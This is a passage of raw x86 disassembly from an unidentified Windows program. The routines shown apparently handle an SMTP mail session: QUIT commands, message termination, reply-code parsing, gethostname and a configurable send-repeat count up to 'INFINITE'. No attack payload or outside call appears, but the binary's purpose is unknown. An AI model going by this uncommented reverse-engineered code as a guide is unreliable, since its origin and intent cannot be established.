jnz short loc_4136E3
loc_4136D9: ; CODE XREF: sub_413410+2C2�j
mov edi, 1
mov esi, 2
loc_4136E3: ; CODE XREF: sub_413410+2BB�j
; sub_413410+2C7�j
call sub_413870
mov [esp+0B4h+var_8C], ebx
inc esi
jmp short loc_413670
; ---------------------------------------------------------------------------
loc_4136EF: ; CODE XREF: sub_413410+267�j
mov eax, [esp+0B4h+var_70]
cmp eax, ebx
mov byte ptr [esp+0B4h+var_4], 4
jz short loc_413708
push eax
call sub_41930D
add esp, 4
loc_413708: ; CODE XREF: sub_413410+2ED�j
mov eax, [esp+0B4h+var_60]
cmp eax, ebx
mov byte ptr [esp+0B4h+var_4], 3
jz short loc_413721
push eax
call sub_41930D
add esp, 4
loc_413721: ; CODE XREF: sub_413410+126�j
; sub_413410+19B�j ...
mov eax, [esp+0B4h+var_88]
cmp eax, ebx
mov byte ptr [esp+0B4h+var_4], 2
jz short loc_41373A
push eax
call sub_41930D
add esp, 4
loc_41373A: ; CODE XREF: sub_413410+31F�j
mov eax, [esp+0B4h+var_7C]
cmp eax, ebx
mov byte ptr [esp+0B4h+var_4], 1
jz short loc_413753
push eax
call sub_41930D
add esp, 4
loc_413753: ; CODE XREF: sub_413410+338�j
mov eax, [esp+0B4h+var_98]
cmp eax, ebx
mov byte ptr [esp+0B4h+var_4], bl
jz short loc_41376B
push eax
call sub_41930D
add esp, 4
loc_41376B: ; CODE XREF: sub_413410+350�j
mov eax, [esp+0B4h+var_A4]
cmp eax, ebx
mov [esp+0B4h+var_4], 0FFFFFFFFh
jz short loc_413787
push eax
call sub_41930D
add esp, 4
loc_413787: ; CODE XREF: sub_413410+36C�j
pop edi
pop esi
mov eax, ebp
pop ebp
pop ebx
mov ecx, [esp+0A4h+var_C]
mov large fs:0, ecx
add esp, 0A4h
retn
; ---------------------------------------------------------------------------
loc_4137A2: ; CODE XREF: sub_413410+6F�j
; sub_413410+7B�j
mov ecx, [esp+0A8h+var_C]
xor eax, eax
pop ebx
mov large fs:0, ecx
add esp, 0A4h
retn
sub_413410 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4137C0 proc near ; CODE XREF: sub_412CA0+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
push 0
call dword_424130 ; GetModuleHandleA
mov edi, [esp+8+arg_0]
push 3Ah
push edi
mov dword_430AAC, eax
call sub_41A3F0
mov esi, [esp+10h+arg_4]
add esp, 8
test eax, eax
jz short loc_4137FA
mov byte ptr [eax], 0
inc eax
mov edx, esi
sub edx, eax
mov edi, edi
loc_4137F0: ; CODE XREF: sub_4137C0+38�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4137F0
loc_4137FA: ; CODE XREF: sub_4137C0+24�j
cmp byte ptr [esi], 0
mov eax, [esp+8+arg_C]
jz short loc_413805
mov eax, esi
loc_413805: ; CODE XREF: sub_4137C0+41�j
push offset dword_430AA8
push eax
push edi
call sub_4164F0
add esp, 0Ch
test eax, eax
jz short loc_41383D
cmp eax, 0FAEh
jnz short loc_41385C
cmp byte ptr [esi], 0
mov eax, [esp+8+arg_8]
jz short loc_41382A
mov eax, esi
loc_41382A: ; CODE XREF: sub_4137C0+66�j
push offset dword_430AA8
push eax
push edi
call sub_4164F0
add esp, 0Ch
test eax, eax
jnz short loc_41385C
loc_41383D: ; CODE XREF: sub_4137C0+56�j
mov al, byte_4306A8
test al, al
jnz short loc_413862
push 400h
push offset byte_4306A8
call sub_4163B0
add esp, 8
test eax, eax
jz short loc_413862
loc_41385C: ; CODE XREF: sub_4137C0+5D�j
; sub_4137C0+7B�j
pop edi
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_413862: ; CODE XREF: sub_4137C0+84�j
; sub_4137C0+9A�j
pop edi
xor eax, eax
pop esi
retn
sub_4137C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413870 proc near ; CODE XREF: sub_412CA0+B3�p
; sub_412CA0:loc_412F10�p ...
mov eax, dword_430AA8
push eax
call sub_4164B0
add esp, 4
test eax, eax
jz short loc_413886
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_413886: ; CODE XREF: sub_413870+10�j
mov eax, dword_430AB0
test eax, eax
jz short loc_4138A0
push eax
call dword_424118 ; FreeLibrary
mov dword_430AB0, 0
loc_4138A0: ; CODE XREF: sub_413870+1D�j
xor eax, eax
retn
sub_413870 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4138B0 proc near ; CODE XREF: sub_412CA0+16B�p
; sub_412CA0+24B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, edx
push esi
lea esi, [eax+1]
lea ebx, [ebx+0]
loc_4138C0: ; CODE XREF: sub_4138B0+15�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4138C0
sub eax, esi
push eax
mov eax, [esp+8+arg_0]
push edx
push eax
call sub_4162E0
add esp, 0Ch
neg eax
sbb eax, eax
pop esi
retn
sub_4138B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4138E0 proc near ; CODE XREF: sub_414220+D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 8
push ebx
mov ebx, [esp+0Ch+arg_4]
push ebp
push esi
push edi
push ebx
call dword_424094 ; lstrlen
mov esi, eax
push offset asc_424828 ; "\r\n\r\n"
add esi, ebx
push ebx
mov [esp+20h+var_4], esi
call sub_4199F0
add esp, 8
test eax, eax
mov [esp+18h+var_8], eax
jnz short loc_413914
mov [esp+18h+var_8], esi
loc_413914: ; CODE XREF: sub_4138E0+2E�j
mov ebp, [esp+18h+arg_0]
xor dl, dl
mov byte ptr [esp+18h+arg_4], dl
xor eax, eax
loc_413920: ; CODE XREF: sub_4138E0+CA�j
cmp ebx, esi
jnb loc_4139B8
mov cl, [ebx]
cmp cl, 2Eh
jnz short loc_413946
cmp dl, 0Ah
jnz short loc_413940
push 1
push ebx
push ebp
call sub_416300
add esp, 0Ch
loc_413940: ; CODE XREF: sub_4138E0+52�j
test eax, eax
jnz short loc_4139A1
jmp short loc_413995
; ---------------------------------------------------------------------------
loc_413946: ; CODE XREF: sub_4138E0+4D�j
cmp cl, 0Dh
jnz short loc_413977
cmp ebx, [esp+18h+var_8]
jnb short loc_413970
mov ecx, 3
mov edi, offset asc_424824 ; "\r\r\n"
mov esi, ebx
xor edx, edx
repe cmpsb
mov esi, [esp+18h+var_4]
jnz short loc_41396C
add ebx, 2
jmp short loc_4139A1
; ---------------------------------------------------------------------------
loc_41396C: ; CODE XREF: sub_4138E0+85�j
mov dl, byte ptr [esp+18h+arg_4]
loc_413970: ; CODE XREF: sub_4138E0+6F�j
cmp dl, 0Dh
jz short loc_4139A1
jmp short loc_413995
; ---------------------------------------------------------------------------
loc_413977: ; CODE XREF: sub_4138E0+69�j
cmp cl, 0Ah
jnz short loc_413995
cmp dl, 0Dh
jz short loc_413995
push 1
push offset asc_424820 ; "\r"
push ebp
call sub_416300
add esp, 0Ch
test eax, eax
jnz short loc_4139E7
loc_413995: ; CODE XREF: sub_4138E0+64�j
; sub_4138E0+95�j ...
push 1
push ebx
push ebp
call sub_416300
add esp, 0Ch
loc_4139A1: ; CODE XREF: sub_4138E0+62�j
; sub_4138E0+8A�j ...
mov dl, [ebx]
inc ebx
test eax, eax
mov byte ptr [esp+18h+arg_4], dl
jz loc_413920
pop edi
pop esi
pop ebp
pop ebx
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_4139B8: ; CODE XREF: sub_4138E0+42�j
test eax, eax
jnz short loc_4139E7
cmp dl, 0Ah
jz short loc_4139CA
push 5
push offset a__0 ; "\r\n.\r\n"
jmp short loc_4139D1
; ---------------------------------------------------------------------------
loc_4139CA: ; CODE XREF: sub_4138E0+DF�j
push 3
push offset a_ ; ".\r\n"
loc_4139D1: ; CODE XREF: sub_4138E0+E8�j
push ebp
call sub_416300
add esp, 0Ch
test eax, eax
jnz short loc_4139E7
push ebp
call sub_416320
add esp, 4
loc_4139E7: ; CODE XREF: sub_4138E0+B3�j
; sub_4138E0+DA�j ...
pop edi
pop esi
pop ebp
pop ebx
add esp, 8
retn
sub_4138E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4139F0 proc near ; CODE XREF: sub_412CA0:loc_412CEF�p
; sub_413410:loc_413660�p ...
var_4 = dword ptr -4
push ecx
push esi
xor eax, eax
mov ecx, offset word_42B638
push edi
mov [esp+0Ch+var_4], eax
xor esi, esi
lea edi, [ecx+1]
loc_413A03: ; CODE XREF: sub_4139F0+18�j
mov dl, [ecx]
inc ecx
test dl, dl
jnz short loc_413A03
sub ecx, edi
test ecx, ecx
jle short loc_413A41
loc_413A10: ; CODE XREF: sub_4139F0+4B�j
movsx eax, byte ptr word_42B638[esi]
push eax
call sub_41A7C6
mov byte ptr word_42B638[esi], al
mov eax, offset word_42B638
add esp, 4
inc esi
lea edx, [eax+1]
nop
loc_413A30: ; CODE XREF: sub_4139F0+45�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_413A30
sub eax, edx
cmp esi, eax
jl short loc_413A10
mov eax, [esp+0Ch+var_4]
loc_413A41: ; CODE XREF: sub_4139F0+1E�j
mov edi, offset aOnce ; "ONCE"
mov esi, offset word_42B638
mov ecx, 5
xor edx, edx
repe cmpsb
jnz short loc_413A5F
mov eax, 1
mov [esp+0Ch+var_4], eax
loc_413A5F: ; CODE XREF: sub_4139F0+64�j
mov edi, offset aTwice ; "TWICE"
mov esi, offset word_42B638
mov ecx, 6
xor edx, edx
repe cmpsb
jnz short loc_413A7D
mov eax, 2
mov [esp+0Ch+var_4], eax
loc_413A7D: ; CODE XREF: sub_4139F0+82�j
mov edi, offset aThrice ; "THRICE"
mov esi, offset word_42B638
mov ecx, 7
xor edx, edx
repe cmpsb
jnz short loc_413A9B
mov eax, 3
mov [esp+0Ch+var_4], eax
loc_413A9B: ; CODE XREF: sub_4139F0+A0�j
mov edi, offset aInfinite ; "INFINITE"
mov esi, offset word_42B638
mov ecx, 9
xor edx, edx
repe cmpsb
jnz short loc_413AB7
or eax, 0FFFFFFFFh
mov [esp+0Ch+var_4], eax
loc_413AB7: ; CODE XREF: sub_4139F0+BE�j
mov edi, offset a1 ; "-1"
mov esi, offset word_42B638
mov ecx, 3
xor edx, edx
repe cmpsb
pop edi
pop esi
jnz short loc_413AD3
or eax, 0FFFFFFFFh
pop ecx
retn
; ---------------------------------------------------------------------------
loc_413AD3: ; CODE XREF: sub_4139F0+DC�j
test eax, eax
jnz short loc_413AF8
lea eax, [esp+4+var_4]
push eax
push offset dword_4243F0
push offset word_42B638
call sub_41A3A5
add esp, 0Ch
test eax, eax
jz short loc_413AFD
mov eax, [esp+4+var_4]
test eax, eax
jz short loc_413AFD
loc_413AF8: ; CODE XREF: sub_4139F0+E5�j
cmp eax, 0FFFFFFFEh
jg short loc_413B02
loc_413AFD: ; CODE XREF: sub_4139F0+FF�j
; sub_4139F0+106�j
mov eax, 1
loc_413B02: ; CODE XREF: sub_4139F0+10B�j
pop ecx
retn
sub_4139F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_413B10 proc near ; CODE XREF: sub_412CA0+A4�p
; sub_412CA0+185�p ...
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_80F = byte ptr -80Fh
var_80E = byte ptr -80Eh
var_80D = byte ptr -80Dh
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 0FFFFFFFFh
push offset SEH_413B10
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 820h
mov eax, dword_42A290
push ebx
push ebp
mov [esp+834h+var_10], eax
xor eax, eax
push esi
push edi
mov [esp+83Ch+var_820], eax
mov [esp+83Ch+var_81C], eax
mov [esp+83Ch+var_818], eax
mov ebp, [esp+83Ch+arg_0]
cmp ebp, eax
mov [esp+83Ch+var_4], eax
jz short loc_413B94
cmp [ebp+8], eax
mov [ebp+4], eax
jz short loc_413B68
mov ecx, [ebp+0]
mov [ecx], al
loc_413B68: ; CODE XREF: sub_413B10+51�j
mov ecx, [ebp+0]
cmp ecx, eax
jz short loc_413B88
cmp [ebp+8], eax
mov [ebp+4], eax
jz short loc_413B7A
mov byte ptr [ecx], 0
loc_413B7A: ; CODE XREF: sub_413B10+65�j
push offset byte_4243C3
mov ecx, ebp
call sub_4120B0
jmp short loc_413B94
; ---------------------------------------------------------------------------
loc_413B88: ; CODE XREF: sub_413B10+5D�j
push offset byte_4243C3
mov ecx, ebp
call sub_411FB0
loc_413B94: ; CODE XREF: sub_413B10+49�j
; sub_413B10+76�j
push offset byte_4243C3
call dword_424094 ; lstrlen
mov [esp+83Ch+var_81C], eax
inc eax
push eax
mov [esp+840h+var_818], eax
call sub_4191C1
mov ecx, offset byte_4243C3
mov edx, eax
add esp, 4
mov [esp+83Ch+var_820], eax
sub edx, ecx
mov edi, edi
loc_413BC0: ; CODE XREF: sub_413B10+B8�j
mov al, [ecx]
mov [edx+ecx], al
inc ecx
test al, al
jnz short loc_413BC0
lea esi, [esp+83Ch+var_810]
mov edi, edi
loc_413BD0: ; CODE XREF: sub_413B10+3B5�j
; sub_413B10+3BD�j ...
mov [esp+83Ch+var_80D], 0
mov byte ptr [esp+83Ch+var_82C+3], 2Eh
lea ebx, [ebx+0]
loc_413BE0: ; CODE XREF: sub_413B10+109�j
mov eax, dword_430AA8
lea edx, [esp+83Ch+var_82C+3]
push edx
push 0
push eax
call sub_4162A0
add esp, 0Ch
test eax, eax
mov [esp+83Ch+var_828], eax
jnz loc_413EE0
mov al, byte ptr [esp+83Ch+var_82C+3]
test al, al
jz short loc_413C17
lea ecx, [esp+83Ch+var_11]
cmp esi, ecx
jz short loc_413C17
mov [esi], al
inc esi
loc_413C17: ; CODE XREF: sub_413B10+F7�j
; sub_413B10+102�j
cmp al, 0Ah
jnz short loc_413BE0
mov ecx, [esp+83Ch+arg_4]
test ecx, ecx
mov byte ptr [esi], 0
jz loc_413DBC
mov cl, [esp+83Ch+var_810]
cmp cl, 30h
mov dl, [esp+83Ch+var_80D]
jl short loc_413C60
cmp cl, 39h
jg short loc_413C60
mov cl, [esp+83Ch+var_80F]
cmp cl, 30h
jl short loc_413C60
cmp cl, 39h
jg short loc_413C60
mov cl, [esp+83Ch+var_80E]
cmp cl, 30h
jl short loc_413C60
cmp cl, 39h
jg short loc_413C60
cmp dl, 20h
jz short loc_413C69
loc_413C60: ; CODE XREF: sub_413B10+128�j
; sub_413B10+12D�j ...
cmp dl, 2Dh
jnz loc_413DB2
loc_413C69: ; CODE XREF: sub_413B10+14E�j
lea edx, [esp+83Ch+var_810]
push edx
call dword_424094 ; lstrlen
mov ecx, [esp+83Ch+var_81C]
lea ebx, [ecx+eax]
mov ecx, [esp+83Ch+var_818]
mov [esp+83Ch+var_814], eax
lea eax, [ebx+1]
cmp eax, ecx
jbe short loc_413CD7
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [esp+840h+var_818], eax
call sub_4191C1
mov [esp+840h+var_824], eax
mov eax, [esp+840h+var_820]
add esp, 4
test eax, eax
jz short loc_413CCF
mov ecx, [esp+83Ch+var_81C]
mov edi, [esp+83Ch+var_824]
inc ecx
mov edx, ecx
shr ecx, 2
mov esi, eax
rep movsd
mov ecx, edx
and ecx, 3
push eax
rep movsb
call sub_41930D
add esp, 4
loc_413CCF: ; CODE XREF: sub_413B10+19B�j
mov eax, [esp+83Ch+var_824]
mov [esp+83Ch+var_820], eax
loc_413CD7: ; CODE XREF: sub_413B10+178�j
mov edx, [esp+83Ch+var_81C]
mov eax, [esp+83Ch+var_820]
mov ecx, [esp+83Ch+var_814]
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
lea esi, [esp+83Ch+var_810]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [ebx+eax], 0
cmp [esp+83Ch+var_80D], 20h
mov [esp+83Ch+var_81C], ebx
jnz loc_413E53
loc_413D0B: ; CODE XREF: sub_413B10+39A�j
; sub_413B10+3A9�j
test ebp, ebp
mov edi, [esp+83Ch+var_820]
jz loc_4140D5
test edi, edi
jz loc_4140D5
cmp byte ptr [edi], 0
mov eax, edi
mov [esp+83Ch+var_824], eax
jz loc_413FF6
mov edi, edi
loc_413D30: ; CODE XREF: sub_413B10+4E0�j
mov al, [eax]
cmp al, 0Dh
jz loc_413FE2
cmp al, 0Ah
mov ecx, [ebp+8]
jnz loc_413F04
mov ebx, [ebp+4]
inc ebx
lea eax, [ebx+1]
cmp eax, ecx
jbe short loc_413D98
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [ebp+8], eax
call sub_4191C1
mov esi, [ebp+0]
add esp, 4
test esi, esi
mov [esp+83Ch+var_828], eax
jz short loc_413D91
mov ecx, [ebp+4]
inc ecx
mov edx, ecx
shr ecx, 2
mov edi, eax
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
push eax
call sub_41930D
add esp, 4
loc_413D91: ; CODE XREF: sub_413B10+25F�j
mov eax, [esp+83Ch+var_828]
mov [ebp+0], eax
loc_413D98: ; CODE XREF: sub_413B10+23E�j
mov eax, [ebp+4]
mov ecx, [ebp+0]
add ecx, eax
xor al, al
mov [ecx], al
mov edx, [ebp+0]
mov [ebx+edx], al
mov [ebp+4], ebx
jmp loc_413FE2
; ---------------------------------------------------------------------------
loc_413DB2: ; CODE XREF: sub_413B10+153�j
mov [esp+83Ch+var_80D], 0
jmp loc_413E57
; ---------------------------------------------------------------------------
loc_413DBC: ; CODE XREF: sub_413B10+117�j
lea eax, [esp+83Ch+var_810]
push eax
call dword_424094 ; lstrlen
mov ecx, [esp+83Ch+var_81C]
lea ebx, [ecx+eax]
mov ecx, [esp+83Ch+var_818]
mov [esp+83Ch+var_814], eax
lea eax, [ebx+1]
cmp eax, ecx
jbe short loc_413E2A
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [esp+840h+var_818], eax
call sub_4191C1
mov [esp+840h+var_824], eax
mov eax, [esp+840h+var_820]
add esp, 4
test eax, eax
jz short loc_413E22
mov ecx, [esp+83Ch+var_81C]
mov edi, [esp+83Ch+var_824]
inc ecx
mov edx, ecx
shr ecx, 2
mov esi, eax
rep movsd
mov ecx, edx
and ecx, 3
push eax
rep movsb
call sub_41930D
add esp, 4
loc_413E22: ; CODE XREF: sub_413B10+2EE�j
mov eax, [esp+83Ch+var_824]
mov [esp+83Ch+var_820], eax
loc_413E2A: ; CODE XREF: sub_413B10+2CB�j
mov edx, [esp+83Ch+var_81C]
mov eax, [esp+83Ch+var_820]
mov ecx, [esp+83Ch+var_814]
lea edi, [edx+eax]
mov edx, ecx
shr ecx, 2
lea esi, [esp+83Ch+var_810]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov byte ptr [ebx+eax], 0
mov [esp+83Ch+var_81C], ebx
loc_413E53: ; CODE XREF: sub_413B10+1F5�j
mov al, byte ptr [esp+83Ch+var_82C+3]
loc_413E57: ; CODE XREF: sub_413B10+2A7�j
mov ecx, dword_42A040
lea edx, ds:0[ecx*4]
xor esi, esi
test edx, edx
jle short loc_413EB3
mov edi, dword_42408C
loc_413E70: ; CODE XREF: sub_413B10+398�j
mov ecx, dword_430AA8
lea eax, [esp+83Ch+var_82C+3]
push eax
push 1
push ecx
call sub_4162A0
add esp, 0Ch
cmp eax, 0FADh
mov [esp+83Ch+var_828], eax
jnz short loc_413EAF
push 0FAh
call edi ; Sleep
mov edx, dword_42A040
inc esi
lea eax, ds:0[edx*4]
cmp esi, eax
jl short loc_413E70
jmp loc_413D0B
; ---------------------------------------------------------------------------
loc_413EAF: ; CODE XREF: sub_413B10+37F�j
mov al, byte ptr [esp+83Ch+var_82C+3]
loc_413EB3: ; CODE XREF: sub_413B10+358�j
mov ecx, [esp+83Ch+var_828]
test ecx, ecx
jnz loc_413D0B
cmp al, 0Dh
lea esi, [esp+83Ch+var_810]
jz loc_413BD0
cmp al, 0Ah
jz loc_413BD0
mov [esp+83Ch+var_810], al
lea esi, [esp+83Ch+var_80F]
jmp loc_413BD0
; ---------------------------------------------------------------------------
loc_413EE0: ; CODE XREF: sub_413B10+EB�j
mov eax, [esp+83Ch+var_820]
test eax, eax
mov [esp+83Ch+var_4], 0FFFFFFFFh
jz short loc_413EFC
push eax
call sub_41930D
add esp, 4
loc_413EFC: ; CODE XREF: sub_413B10+3E1�j
or eax, 0FFFFFFFFh
jmp loc_41419A
; ---------------------------------------------------------------------------
loc_413F04: ; CODE XREF: sub_413B10+22F�j
cmp al, 9
jnz short loc_413F73
mov ebx, [ebp+4]
inc ebx
lea eax, [ebx+1]
cmp eax, ecx
jbe short loc_413F5B
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [ebp+8], eax
call sub_4191C1
mov esi, [ebp+0]
add esp, 4
test esi, esi
mov [esp+83Ch+var_828], eax
jz short loc_413F54
mov ecx, [ebp+4]
inc ecx
mov edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+0]
push eax
call sub_41930D
add esp, 4
loc_413F54: ; CODE XREF: sub_413B10+422�j
mov ecx, [esp+83Ch+var_828]
mov [ebp+0], ecx
loc_413F5B: ; CODE XREF: sub_413B10+401�j
mov eax, [ebp+4]
mov edx, [ebp+0]
add edx, eax
mov al, 20h
mov [edx], al
mov eax, [ebp+0]
mov byte ptr [ebx+eax], 0
mov [ebp+4], ebx
jmp short loc_413FE2
; ---------------------------------------------------------------------------
loc_413F73: ; CODE XREF: sub_413B10+3F6�j
mov edi, [ebp+4]
inc edi
lea eax, [edi+1]
cmp eax, ecx
mov [esp+83Ch+var_814], edi
jbe short loc_413FC8
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [ebp+8], eax
call sub_4191C1
mov esi, [ebp+0]
add esp, 4
test esi, esi
mov ebx, eax
jz short loc_413FC5
mov ecx, [ebp+4]
inc ecx
mov edx, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
push eax
call sub_41930D
mov edi, [esp+840h+var_814]
add esp, 4
loc_413FC5: ; CODE XREF: sub_413B10+48F�j
mov [ebp+0], ebx
loc_413FC8: ; CODE XREF: sub_413B10+470�j
mov ecx, [ebp+4]
mov eax, [ebp+0]
add eax, ecx
mov ecx, [esp+83Ch+var_824]
mov dl, [ecx]
mov [eax], dl
mov eax, [ebp+0]
mov byte ptr [edi+eax], 0
mov [ebp+4], edi
loc_413FE2: ; CODE XREF: sub_413B10+224�j
; sub_413B10+29D�j ...
mov eax, [esp+83Ch+var_824]
mov cl, [eax+1]
inc eax
test cl, cl
mov [esp+83Ch+var_824], eax
jnz loc_413D30
loc_413FF6: ; CODE XREF: sub_413B10+218�j
mov ebx, [ebp+4]
mov eax, [ebp+8]
inc ebx
lea edi, [ebx+1]
cmp edi, eax
mov [esp+83Ch+var_828], edi
jbe short loc_414055
lea eax, [edi+1FFFh]
and eax, 0FFFFE000h
push eax
mov [ebp+8], eax
call sub_4191C1
mov esi, [ebp+0]
add esp, 4
test esi, esi
mov [esp+83Ch+var_814], eax
jz short loc_414052
mov ecx, [ebp+4]
inc ecx
mov edx, ecx
shr ecx, 2
mov edi, eax
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+0]
push eax
call sub_41930D
mov edi, [esp+840h+var_828]
mov eax, [esp+840h+var_814]
add esp, 4
loc_414052: ; CODE XREF: sub_413B10+518�j
mov [ebp+0], eax
loc_414055: ; CODE XREF: sub_413B10+4F6�j
mov edx, [ebp+4]
mov eax, [ebp+0]
add eax, edx
mov ecx, eax
xor al, al
mov [ecx], al
mov edx, [ebp+0]
mov [ebx+edx], al
mov ecx, [ebp+8]
lea eax, [edi+1]
cmp eax, ecx
mov [ebp+4], ebx
jbe short loc_4140BC
add eax, 1FFFh
and eax, 0FFFFE000h
push eax
mov [ebp+8], eax
call sub_4191C1
mov esi, [ebp+0]
add esp, 4
test esi, esi
mov ebx, eax
jz short loc_4140B9
mov ecx, [ebp+4]
inc ecx
mov eax, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+0]
push eax
call sub_41930D
mov edi, [esp+840h+var_828]
add esp, 4
loc_4140B9: ; CODE XREF: sub_413B10+583�j
mov [ebp+0], ebx
loc_4140BC: ; CODE XREF: sub_413B10+564�j
mov eax, [ebp+4]
mov ecx, [ebp+0]
add ecx, eax
xor al, al
mov [ecx], al
mov edx, [ebp+0]
mov [edi+edx], al
mov [ebp+4], edi
mov edi, [esp+83Ch+var_820]
loc_4140D5: ; CODE XREF: sub_413B10+201�j
; sub_413B10+209�j
mov esi, [esp+83Ch+arg_4]
test esi, esi
jz loc_414171
push edi
call sub_419C6A
mov [esi], eax
mov eax, [esp+840h+var_81C]
add esp, 4
cmp eax, 9
jbe short loc_414171
lea ecx, [edi+4]
mov eax, ecx
mov dl, [eax]
inc eax
cmp dl, 30h
jl short loc_414171
mov dl, [eax]
inc eax
cmp dl, 39h
jg short loc_414171
mov dl, [eax]
inc eax
cmp dl, 2Eh
jnz short loc_414171
mov dl, [eax]
inc eax
cmp dl, 30h
jl short loc_414171
mov dl, [eax]
inc eax
cmp dl, 39h
jg short loc_414171
mov dl, [eax]
inc eax
cmp dl, 2Eh
jnz short loc_414171
mov dl, [eax]
inc eax
cmp dl, 30h
jl short loc_414171
cmp byte ptr [eax], 39h
jg short loc_414171
lea eax, [esp+83Ch+var_824]
push eax
lea edx, [esp+840h+var_828]
push edx
lea eax, [esp+844h+var_814]
push eax
push offset aU_U_U ; "%u.%u.%u"
push ecx
call sub_41A3A5
mov eax, [esp+850h+var_814]
mov edx, [esp+850h+var_828]
lea ecx, [eax+eax*4]
lea eax, [edx+ecx*2]
mov ecx, [esp+850h+var_824]
lea eax, [eax+eax*4]
lea edx, [ecx+eax*2]
add esp, 14h
mov [esi], edx
loc_414171: ; CODE XREF: sub_413B10+5CE�j
; sub_413B10+5E6�j ...
lea eax, [esp+83Ch+var_810]
push eax
call sub_419C6A
add esp, 4
test edi, edi
mov esi, eax
mov [esp+83Ch+var_4], 0FFFFFFFFh
jz short loc_414198
push edi
call sub_41930D
add esp, 4
loc_414198: ; CODE XREF: sub_413B10+67D�j
mov eax, esi
loc_41419A: ; CODE XREF: sub_413B10+3EF�j
mov ecx, [esp+83Ch+var_C]
pop edi
pop esi
pop ebp
mov large fs:0, ecx
mov ecx, [esp+830h+var_10]
pop ebx
call sub_4192B6
add esp, 82Ch
retn
sub_413B10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4141C0 proc near ; CODE XREF: sub_4130B0+2B5�p
; sub_413410+2BD�p
var_4 = byte ptr -4
push ecx
mov eax, dword_430AA8
push esi
push 6
push offset aQuit ; "QUIT\r\n"
push eax
call sub_4162E0
lea ecx, [esp+14h+var_4]
mov esi, eax
push ecx
neg esi
push 0
sbb esi, esi
call sub_413B10
add esp, 14h
mov eax, esi
pop esi
pop ecx
retn
sub_4141C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4141F0 proc near ; CODE XREF: sub_4130B0:loc_41320D�p
; sub_4130B0+1CD�p ...
var_4 = byte ptr -4
push ecx
mov eax, dword_430AA8
push 6
push offset aQuit ; "QUIT\r\n"
push eax
call sub_4162E0
lea ecx, [esp+10h+var_4]
push ecx
push 0
call sub_413B10
add esp, 18h
retn
sub_4141F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414220 proc near ; CODE XREF: sub_413410+2AF�p
var_4 = byte ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ecx
mov eax, [esp+4+arg_0]
mov ecx, dword_430AA8
push eax
push ecx
call sub_4138E0
add esp, 8
test eax, eax
jnz short loc_41427B
mov eax, [esp+4+arg_8]
lea edx, [esp+4+var_4]
push edx
push eax
call sub_413B10
mov ecx, [esp+0Ch+arg_4]
add esp, 8
cmp eax, ecx
jz short loc_414279
mov ecx, dword_430AA8
push 6
push offset aQuit ; "QUIT\r\n"
push ecx
call sub_4162E0
lea edx, [esp+10h+var_4]
push edx
push 0
call sub_413B10
add esp, 14h
or eax, 0FFFFFFFFh
pop ecx
retn
; ---------------------------------------------------------------------------
loc_414279: ; CODE XREF: sub_414220+30�j
xor eax, eax
loc_41427B: ; CODE XREF: sub_414220+17�j
pop ecx
retn
sub_414220 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414280 proc near ; CODE XREF: sub_414690+C1�p
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_104 = byte ptr -104h
var_84 = byte ptr -84h
var_4 = dword ptr -4
sub esp, 11Ch
mov eax, dword_42A290
push esi
push edi
mov [esp+124h+var_4], eax
push 80h
lea eax, [esp+128h+var_104]
push eax
call sub_411F38 ; gethostname
lea ecx, [esp+124h+var_104]
push ecx
